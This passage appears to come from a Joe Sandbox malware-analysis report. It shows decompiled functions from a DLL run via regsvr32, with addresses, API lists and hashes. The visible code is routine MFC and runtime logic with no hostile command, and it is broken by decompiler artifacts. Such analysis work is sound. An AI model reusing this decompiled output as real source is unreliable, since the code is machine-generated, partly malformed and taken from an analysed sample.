                                                                                                                0x10032454
                                                                                                                0x1003245d
                                                                                                                0x1003245d
                                                                                                                0x10032460
                                                                                                                0x10032463
                                                                                                                0x10032466
                                                                                                                0x10032469
                                                                                                                0x10032513
                                                                                                                0x10032513
                                                                                                                0x10032516
                                                                                                                0x10032527
                                                                                                                0x1003252a
                                                                                                                0x1003252d
                                                                                                                0x1003252f
                                                                                                                0x10032535
                                                                                                                0x1003253d
                                                                                                                0x10032546
                                                                                                                0x10032546
                                                                                                                0x10032549
                                                                                                                0x1003254c
                                                                                                                0x10032573
                                                                                                                0x10032575
                                                                                                                0x00000000
                                                                                                                0x1003254e
                                                                                                                0x1003254e
                                                                                                                0x1003254e
                                                                                                                0x10032550
                                                                                                                0x1003255a
                                                                                                                0x10032562
                                                                                                                0x10032567
                                                                                                                0x1003256a
                                                                                                                0x1003256b
                                                                                                                0x1003256e
                                                                                                                0x1003256e
                                                                                                                0x00000000
                                                                                                                0x10032550
                                                                                                                0x1003246f
                                                                                                                0x1003246f
                                                                                                                0x10032472
                                                                                                                0x1003247c
                                                                                                                0x1003247f
                                                                                                                0x10032481
                                                                                                                0x10032484
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10032489
                                                                                                                0x10032489
                                                                                                                0x1003248c
                                                                                                                0x1003249a
                                                                                                                0x100324b0
                                                                                                                0x100324be
                                                                                                                0x100324c5
                                                                                                                0x100324cd
                                                                                                                0x100324d5
                                                                                                                0x100324dd
                                                                                                                0x100324e0
                                                                                                                0x100324f1
                                                                                                                0x100324f5
                                                                                                                0x100324f8
                                                                                                                0x100324f8
                                                                                                                0x100324fe
                                                                                                                0x100324fe
                                                                                                                0x10032500
                                                                                                                0x10032500
                                                                                                                0x10032506
                                                                                                                0x1003250a
                                                                                                                0x1003250a
                                                                                                                0x00000000
                                                                                                                0x10032472
                                                                                                                0x10032469
                                                                                                                0x1003242d
                                                                                                                0x1003242d
                                                                                                                0x10032430
                                                                                                                0x10032430
                                                                                                                0x10032432
                                                                                                                0x10032435
                                                                                                                0x10032438
                                                                                                                0x10032439
                                                                                                                0x1003243c
                                                                                                                0x1003243c
                                                                                                                0x00000000
                                                                                                                0x10032430
                                                                                                                0x100323e5
                                                                                                                0x100323e7
                                                                                                                0x100323ea
                                                                                                                0x1003241d
                                                                                                                0x1003241d
                                                                                                                0x00000000
                                                                                                                0x1003241d
                                                                                                                0x100323ec
                                                                                                                0x100323ef
                                                                                                                0x100323f6
                                                                                                                0x100323fc
                                                                                                                0x10032400
                                                                                                                0x10032401
                                                                                                                0x10032401
                                                                                                                0x10032406
                                                                                                                0x10032409
                                                                                                                0x1003240b
                                                                                                                0x1003240e
                                                                                                                0x10032413
                                                                                                                0x10032416
                                                                                                                0x1003241c
                                                                                                                0x00000000
                                                                                                                0x10032409
                                                                                                                0x100323ce
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1473721057-3887548279
                                                                                                                • Opcode ID: 4794f33b9828aa8a43699f7c3482730240ac2f5c0e8e3317ecab65dff5235b8f
                                                                                                                • Instruction ID: 4e79bf42a13b8e982a901a6c30ab1a867a5adc2d132178db6a4f095cf165699d
                                                                                                                • Opcode Fuzzy Hash: 4794f33b9828aa8a43699f7c3482730240ac2f5c0e8e3317ecab65dff5235b8f
                                                                                                                • Instruction Fuzzy Hash: 63514675A00B01DFCB65CF69C98296AB7F5FF48315B504A6EE5828BA91C770F981CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100300E9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E100300E9(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E1003D1E6(E100544B5, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x1005fad4);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E1003D2BE(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E1002A12B( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x1005cf08; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x1005cf0c; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x1005fb24);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_v24 = 0x1006c938;
					E1003D2F0( &_v24, 0x1006522c);
					asm("int3");
					_push(4);
					E1003D1E6(E10052A8D, _t128, _t153, _t155);
					_t132 = E1002D12C(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E10022AE3(_t132);
					}
					return E1003D2BE(_t90);
				}
			}






































                                                                                                                0x100300e9
                                                                                                                0x100300e9
                                                                                                                0x100300f0
                                                                                                                0x100300f5
                                                                                                                0x100300f7
                                                                                                                0x100300fc
                                                                                                                0x10030100
                                                                                                                0x10030105
                                                                                                                0x1003010f
                                                                                                                0x10030110
                                                                                                                0x10030115
                                                                                                                0x10030118
                                                                                                                0x1003011a
                                                                                                                0x1003011b
                                                                                                                0x10030122
                                                                                                                0x10030297
                                                                                                                0x1003029f
                                                                                                                0x10030128
                                                                                                                0x10030132
                                                                                                                0x00000000
                                                                                                                0x10030134
                                                                                                                0x1003013a
                                                                                                                0x10030143
                                                                                                                0x1003014c
                                                                                                                0x10030153
                                                                                                                0x1003015a
                                                                                                                0x1003015d
                                                                                                                0x10030160
                                                                                                                0x10030163
                                                                                                                0x10030166
                                                                                                                0x1003016b
                                                                                                                0x10030170
                                                                                                                0x10030173
                                                                                                                0x00000000
                                                                                                                0x10030175
                                                                                                                0x10030175
                                                                                                                0x1003017a
                                                                                                                0x1003017d
                                                                                                                0x00000000
                                                                                                                0x1003017f
                                                                                                                0x1003017f
                                                                                                                0x10030185
                                                                                                                0x1003018e
                                                                                                                0x10030199
                                                                                                                0x1003019b
                                                                                                                0x100301a1
                                                                                                                0x100301a1
                                                                                                                0x100301a4
                                                                                                                0x100301a7
                                                                                                                0x100301ba
                                                                                                                0x100301cc
                                                                                                                0x100301d4
                                                                                                                0x100301e6
                                                                                                                0x100301ee
                                                                                                                0x10030201
                                                                                                                0x10030209
                                                                                                                0x1003021b
                                                                                                                0x10030223
                                                                                                                0x10030229
                                                                                                                0x10030231
                                                                                                                0x10030232
                                                                                                                0x10030237
                                                                                                                0x1003023c
                                                                                                                0x1003023e
                                                                                                                0x1003023e
                                                                                                                0x10030242
                                                                                                                0x10030248
                                                                                                                0x1003024c
                                                                                                                0x1003024d
                                                                                                                0x10030256
                                                                                                                0x1003025c
                                                                                                                0x10030261
                                                                                                                0x10030267
                                                                                                                0x1003026d
                                                                                                                0x10030270
                                                                                                                0x10030270
                                                                                                                0x10030277
                                                                                                                0x1003027d
                                                                                                                0x10030280
                                                                                                                0x10030285
                                                                                                                0x1003028a
                                                                                                                0x1003028a
                                                                                                                0x10030291
                                                                                                                0x00000000
                                                                                                                0x10030291
                                                                                                                0x1003017d
                                                                                                                0x10030173
                                                                                                                0x10030132
                                                                                                                0x10030107
                                                                                                                0x10030107
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: @
                                                                                                                • API String ID: 431132790-2766056989
                                                                                                                • Opcode ID: d649c840626f787c90f7b880a5a45246c03de395b0de320172a86c36782732d5
                                                                                                                • Instruction ID: d0d5ac566261c14da1d5b792e65bc9ff5ec9e63663f12a772aa802e3be5dd10e
                                                                                                                • Opcode Fuzzy Hash: d649c840626f787c90f7b880a5a45246c03de395b0de320172a86c36782732d5
                                                                                                                • Instruction Fuzzy Hash: 1851C2B1A012099FDB04CFA4C898AEEB7F9FF48305F10456AE516EB251E774A945CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001C538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1001C538(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t35;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t40;
				intOrPtr* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t61;
				void* _t64;
				intOrPtr _t66;
				void* _t76;

				_t76 = __eflags;
				E1002DA2D(1);
				E1003D2F0(0, 0);
				asm("int3");
				_push(_t56);
				_push(_t64);
				_push(_t61);
				_t66 = E10022C52(_t56, _t61, _t64, _t76) + 0x7c;
				_t57 =  *((intOrPtr*)(E10023187(_t56, _t61, _t66, _t76) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L5:
					_v8 =  *((intOrPtr*)(E1003D47E(__eflags)));
					_t35 = E1003D47E(__eflags);
					_push(_a16);
					 *_t35 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E1003D617(_t66, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t57);
				} else {
					_t79 = _a16;
					if(_a16 != 0) {
						goto L5;
					} else {
						_v8 =  *((intOrPtr*)(E1003D47E(_t79)));
						_t54 = E1003D47E(_t79);
						_push(_a4);
						 *_t54 = 0;
						E1003D617(_t66, 0x60, 0x5f, "Afx:%p:%x", _t57);
					}
				}
				_t37 = E1003D47E(_t79);
				_t80 =  *_t37;
				if( *_t37 == 0) {
					_t38 = E1003D47E(__eflags);
					_t60 = _v8;
					 *_t38 = _v8;
				} else {
					E10017114( *((intOrPtr*)(E1003D47E(_t80))));
					_pop(_t60);
				}
				_push( &_v48);
				_push(_t66);
				_push(_t57);
				_t40 = E10018524(_t57, _t60, 0, _t66, _t80);
				_t81 = _t40;
				if(_t40 == 0) {
					_v48 = _a4;
					_v44 = DefWindowProcA;
					_v28 = _a16;
					_v24 = _a8;
					_v20 = _a12;
					_push( &_v48);
					_v36 = 0;
					_v40 = 0;
					_v32 = _t57;
					_v16 = 0;
					_v12 = _t66;
					if(E1001C4BB(_t57, _t60, 0, _t66, _t81) == 0) {
						E10023F14(_t60);
					}
				}
				return _t66;
			}





























                                                                                                                0x1001c538
                                                                                                                0x1001c53a
                                                                                                                0x1001c543
                                                                                                                0x1001c548
                                                                                                                0x1001c54f
                                                                                                                0x1001c550
                                                                                                                0x1001c551
                                                                                                                0x1001c559
                                                                                                                0x1001c561
                                                                                                                0x1001c569
                                                                                                                0x1001c59e
                                                                                                                0x1001c5a5
                                                                                                                0x1001c5a8
                                                                                                                0x1001c5ad
                                                                                                                0x1001c5b0
                                                                                                                0x1001c5b2
                                                                                                                0x1001c5b5
                                                                                                                0x1001c5b8
                                                                                                                0x1001c5c6
                                                                                                                0x1001c570
                                                                                                                0x1001c570
                                                                                                                0x1001c573
                                                                                                                0x00000000
                                                                                                                0x1001c575
                                                                                                                0x1001c57c
                                                                                                                0x1001c57f
                                                                                                                0x1001c584
                                                                                                                0x1001c587
                                                                                                                0x1001c594
                                                                                                                0x1001c599
                                                                                                                0x1001c573
                                                                                                                0x1001c5ce
                                                                                                                0x1001c5d3
                                                                                                                0x1001c5d5
                                                                                                                0x1001c5e6
                                                                                                                0x1001c5eb
                                                                                                                0x1001c5ee
                                                                                                                0x1001c5d7
                                                                                                                0x1001c5de
                                                                                                                0x1001c5e3
                                                                                                                0x1001c5e3
                                                                                                                0x1001c5f3
                                                                                                                0x1001c5f4
                                                                                                                0x1001c5f5
                                                                                                                0x1001c5f6
                                                                                                                0x1001c5fe
                                                                                                                0x1001c600
                                                                                                                0x1001c605
                                                                                                                0x1001c60d
                                                                                                                0x1001c613
                                                                                                                0x1001c619
                                                                                                                0x1001c61f
                                                                                                                0x1001c625
                                                                                                                0x1001c626
                                                                                                                0x1001c629
                                                                                                                0x1001c62c
                                                                                                                0x1001c62f
                                                                                                                0x1001c632
                                                                                                                0x1001c63c
                                                                                                                0x1001c63e
                                                                                                                0x1001c63e
                                                                                                                0x1001c63c
                                                                                                                0x1001c649

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002DA2D: LeaveCriticalSection.KERNEL32(?,1002D1F0,00000010,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA44
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1001C543
                                                                                                                  • Part of subcall function 1003D2F0: RaiseException.KERNEL32(10023196,100172B8,DF7C0CDA,?,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1003D330
                                                                                                                • __snprintf_s.LIBCMT ref: 1001C594
                                                                                                                  • Part of subcall function 1003D617: __vsnprintf_s_l.LIBCMT ref: 1003D62C
                                                                                                                • __snprintf_s.LIBCMT ref: 1001C5C6
                                                                                                                  • Part of subcall function 1003D47E: __getptd_noexit.LIBCMT ref: 1003D47E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snprintf_s$CriticalExceptionException@8LeaveRaiseSectionThrow__getptd_noexit__vsnprintf_s_l
                                                                                                                • String ID: Afx:%p:%x
                                                                                                                • API String ID: 3966753335-3201128726
                                                                                                                • Opcode ID: d1006a21a8d9b81870fedc7bf6ca61790a1b2c54f9d960ff5418e2ea1d088644
                                                                                                                • Instruction ID: 70e73dfe5b20a951b81c56ecee5afc2c7087a6d93b3aa06843e06d0b6497e51a
                                                                                                                • Opcode Fuzzy Hash: d1006a21a8d9b81870fedc7bf6ca61790a1b2c54f9d960ff5418e2ea1d088644
                                                                                                                • Instruction Fuzzy Hash: 3B2156B4D0060DAFDB11DFA9D841ECEBBF5EF48251F104066F914AB251D770E980DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100396F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100396F6(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t26;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				void* _t40;
				intOrPtr _t41;
				signed int _t42;
				void* _t43;

				_t39 = __ecx;
				_t43 = __ecx;
				_t26 = E100231BA(_t36, __ecx, _t40, __ecx, __eflags);
				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
				if(_a4 != 0) {
					_t42 = _a8;
					__eflags =  *(__ecx + 0x3c) & _t42;
					if(__eflags == 0) {
						 *((intOrPtr*)(E10023187(_t36, _t42, __ecx, __eflags) + 0x38)) = E100396E6;
						_t24 = _t43 + 0x3c;
						 *_t24 =  *(_t43 + 0x3c) | _t42;
						__eflags =  *_t24;
					}
				} else {
					_t37 = _a8;
					if(( *(__ecx + 0x3c) & _t37) != 0) {
						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
							E10018992(_t39, _t49, 1);
						}
						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
							E1003BB70(_t41,  &_v52, 0, 0x30);
							_t32 =  *((intOrPtr*)(_t43 + 0x20));
							_v44 = _t32;
							_v40 = _t32;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
						}
						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
					}
				}
				return 1;
			}



















                                                                                                                0x100396f6
                                                                                                                0x100396ff
                                                                                                                0x10039701
                                                                                                                0x1003970a
                                                                                                                0x1003970d
                                                                                                                0x1003976f
                                                                                                                0x10039772
                                                                                                                0x10039775
                                                                                                                0x1003977c
                                                                                                                0x10039783
                                                                                                                0x10039783
                                                                                                                0x10039783
                                                                                                                0x10039783
                                                                                                                0x1003970f
                                                                                                                0x1003970f
                                                                                                                0x10039715
                                                                                                                0x10039717
                                                                                                                0x1003971a
                                                                                                                0x1003971e
                                                                                                                0x1003971e
                                                                                                                0x10039725
                                                                                                                0x10039735
                                                                                                                0x1003973a
                                                                                                                0x10039740
                                                                                                                0x10039743
                                                                                                                0x10039754
                                                                                                                0x1003975b
                                                                                                                0x10039762
                                                                                                                0x10039762
                                                                                                                0x1003976a
                                                                                                                0x1003976a
                                                                                                                0x10039715
                                                                                                                0x1003978d

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10039735
                                                                                                                • SendMessageA.USER32 ref: 10039762
                                                                                                                  • Part of subcall function 10018992: SendMessageA.USER32 ref: 100189B2
                                                                                                                  • Part of subcall function 10018992: GetKeyState.USER32(00000001), ref: 100189C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$State_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 930327405-3887548279
                                                                                                                • Opcode ID: 705a64a3ae88b1590e3bab5bec9c51ee715fcb2b48b53edf8f19a8fe3169e298
                                                                                                                • Instruction ID: b7a58a3b74f464689faec7e7cd245a18f9c0221c6053fa548eac2f2b071fffc3
                                                                                                                • Opcode Fuzzy Hash: 705a64a3ae88b1590e3bab5bec9c51ee715fcb2b48b53edf8f19a8fe3169e298
                                                                                                                • Instruction Fuzzy Hash: 6011C135914704AFD752DFA1C986B8AB7F4FF44366F00401AE6416A580D3B0A800CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025D49 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E10025D49(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E100202D5(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E10025A62(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E1003B437(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                                0x10025d52
                                                                                                                0x10025d59
                                                                                                                0x10025d5f
                                                                                                                0x10025d6f
                                                                                                                0x10025d77
                                                                                                                0x10025dce
                                                                                                                0x10025dce
                                                                                                                0x10025dce
                                                                                                                0x10025d7d
                                                                                                                0x10025d85
                                                                                                                0x10025d8b
                                                                                                                0x10025d93
                                                                                                                0x10025d94
                                                                                                                0x10025d98
                                                                                                                0x10025da3
                                                                                                                0x10025da9
                                                                                                                0x10025daa
                                                                                                                0x10025dab
                                                                                                                0x00000000
                                                                                                                0x10025dad
                                                                                                                0x10025db8
                                                                                                                0x10025dc7
                                                                                                                0x10025dc7
                                                                                                                0x10025dab
                                                                                                                0x10025ddc

                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10025D6F
                                                                                                                • PathFindExtensionA.SHLWAPI(?), ref: 10025D85
                                                                                                                  • Part of subcall function 100202D5: _strcpy_s.LIBCMT ref: 100202E1
                                                                                                                  • Part of subcall function 10025A62: __EH_prolog3.LIBCMT ref: 10025A81
                                                                                                                  • Part of subcall function 10025A62: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10025AA2
                                                                                                                  • Part of subcall function 10025A62: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10025AB3
                                                                                                                  • Part of subcall function 10025A62: ConvertDefaultLocale.KERNEL32(?), ref: 10025AE9
                                                                                                                  • Part of subcall function 10025A62: ConvertDefaultLocale.KERNEL32(?), ref: 10025AF1
                                                                                                                  • Part of subcall function 10025A62: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10025B05
                                                                                                                  • Part of subcall function 10025A62: ConvertDefaultLocale.KERNEL32(?), ref: 10025B29
                                                                                                                  • Part of subcall function 10025A62: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10025B2F
                                                                                                                  • Part of subcall function 10025A62: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10025B68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                • String ID: %s.dll
                                                                                                                • API String ID: 3444012488-3668843792
                                                                                                                • Opcode ID: 6d73e030381f965241e4796b8595e08e3723f497f4af8001965861db85b80627
                                                                                                                • Instruction ID: 8f2780abeed4f01e88dae2a7ee0c52ebcd0a9cc7144cd043fd87902477eeee7f
                                                                                                                • Opcode Fuzzy Hash: 6d73e030381f965241e4796b8595e08e3723f497f4af8001965861db85b80627
                                                                                                                • Instruction Fuzzy Hash: 580196B2A0021CAFDB19DBB4DD4A9EE73B9DF04701F8501AAF502E3180EA75AE04CA55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10027B8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E10027B8B(void* __ecx, void* __edi) {
				signed short _v16;
				signed short _v20;
				char _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t7;
				void* _t18;
				intOrPtr* _t19;
				void* _t24;
				signed int _t25;

				_t7 =  *0x1006d320; // 0xffffffff
				_t32 = _t7 - 0xffffffff;
				if(_t7 != 0xffffffff) {
					return _t7;
				}
				_push(_t18);
				_push(_t24);
